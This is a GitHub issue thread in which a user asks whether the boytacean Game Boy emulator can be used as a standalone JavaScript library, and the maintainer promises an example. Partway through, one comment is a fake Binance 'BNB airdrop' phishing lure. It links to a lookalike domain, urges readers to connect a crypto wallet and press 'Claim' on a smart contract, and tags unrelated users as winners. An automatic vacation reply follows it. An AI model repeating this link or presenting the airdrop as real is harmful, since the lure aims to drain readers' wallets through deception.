### ISSUE TITLE
Use as a lib

### ISSUE THREAD

**Issue by Allakazan** [joamag/boytacean#2]
There's any way that can i use your emulator as a library out-of-the-box ? I want to integrate on a project of mine but i can't see any ways to make it work

**Comment by joamag** [comment]
@Allakazan Yes, absolutely I'll try to compile a simple example of how you can use it as a library.
Are you planning to use in a web or Rust native context?

**Comment by joamag** [comment]
@Allakazan can you provide some context on the kind of usage your aiming at?

**Comment by Allakazan** [comment]
Sorry for the delay ! I'm looking foward to use boytacean as a simple out of the box js lib on the web. Without any front end.

The goal must be something like, you initialize the Gameboy Class passing the canvas id/element and some configuration object that will contain the another options.
I tried to enter further on your code to see what i could do but some code is from the emu-kit package so i couldn't had any success on it.

My question was if there's is any way to use boytacean as a js lib :)

**Comment by joamag** [comment]
That should be possible let me compile an example and send that to you

**Comment by Allakazan** [comment]
Thanks ! Your emulator is the best i found for web, the sound is really smooth

**Comment by joamag** [comment]
> 

Thanks, man and sorry for taking so long to create the embed example. Still on my queue no worries.

**Comment by joamag** [comment]
> Thanks ! Your emulator is the best i found for web, the sound is really smooth

@Allakazan Thanks, man, and sorry for taking so long to create the embed example. Still on my queue no worries.

**Comment by mrpanday93** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @parksjin01, @kurax, @elibdev, @tixo, @aacai, @sean3112, @qihaiyan

**Comment by aacai** [comment]
这是来自QQ邮箱的假期自动回复邮件。你好，我最近正在休假中，无法亲自回复你的邮件。我将在假期结束后，尽快给你回复。
